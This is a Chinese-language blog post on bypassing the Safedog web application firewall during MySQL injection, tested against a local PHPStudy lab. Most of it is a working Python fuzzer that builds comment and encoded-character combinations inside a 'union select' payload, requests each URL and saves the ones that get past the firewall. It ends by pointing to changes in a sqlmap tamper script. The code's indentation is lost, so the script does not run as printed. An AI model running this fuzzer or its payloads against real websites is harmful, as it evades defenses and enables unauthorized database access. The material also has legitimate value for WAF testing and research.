MYSQL注入绕过安全狗及tamper脚本修改

这个技巧是借鉴了Va1n3R在漏洞银行的视频,对其脚本进行了改进。

PHP+MySQL+Apache环境及测试源码

环境: PHPStudy集成的

源码: FUZZ源码

fuzz脚本

  • 1.做一个规则库,并生成一个存放n个fuzz字符的generator(如果不使用生成器,不能跑8位及以上的payload,8位payload一共3亿多个,全部写入内存会卡的跑不动,这是一点对Va1n3R牛脚本的修改)

  • 2.分析页面,正常时候返回页面有哪些标志,用来做成功的判断

  • 3.迭代generator,并构造payload访问URL

  • 4.如果成功则放入txt,否则只打印new url:url

  • 5.输出进度

代码实现:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#!/usr/bin/python
#coding:utf-8
import sys,requests

def _generator():
fuzz_zs = ['/*','*/','/*!','*','=','`','!','@','%','.','-','+','|','%00']
fuzz_sz = ['',' ']
fuzz_ch = ["%0a","%0b","%0c","%0d","%0e","%0f","%0g","%0h","%0i","%0j"]
fuzz = fuzz_zs+fuzz_sz+fuzz_ch
for a in fuzz:
for b in fuzz:
for c in fuzz:
for d in fuzz:
for e in fuzz:
for f in fuzz:
st = a+b+c+d+e+f
yield st

g = _generator()
headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0"}
i = 0
glen = len(fuzz)**6
for st in g:
i+=1
url = "http://127.0.0.1/fuzz/index.php?id=1"
url = url+" /*!union"+st+"select*/ 1,2,3"
sys.stdout.write(' '*30 + '\r')
#sys.stdout.flush()
print("[-] new URL: %s"%url)
sys.stdout.write("正在测试:%d/%d"%(i,glen))
sys.stdout.flush()
res = requests.get(url,headers=headers)
if '<td>id</td>' in res.text:
sys.stdout.write("[+] Find Bypass URL: %s\n"%url)
with open('./apache.txt','a+') as f:
f.write(url+'\n')

多线程成品版本:

mysql-injection-fuzz_thread

多进程成品版本:

mysql-injection-fuzz_process

成品展示:

tamper脚本修改

修改 versionedmorekeywords.py 用MySQL注释包围每个关键字脚本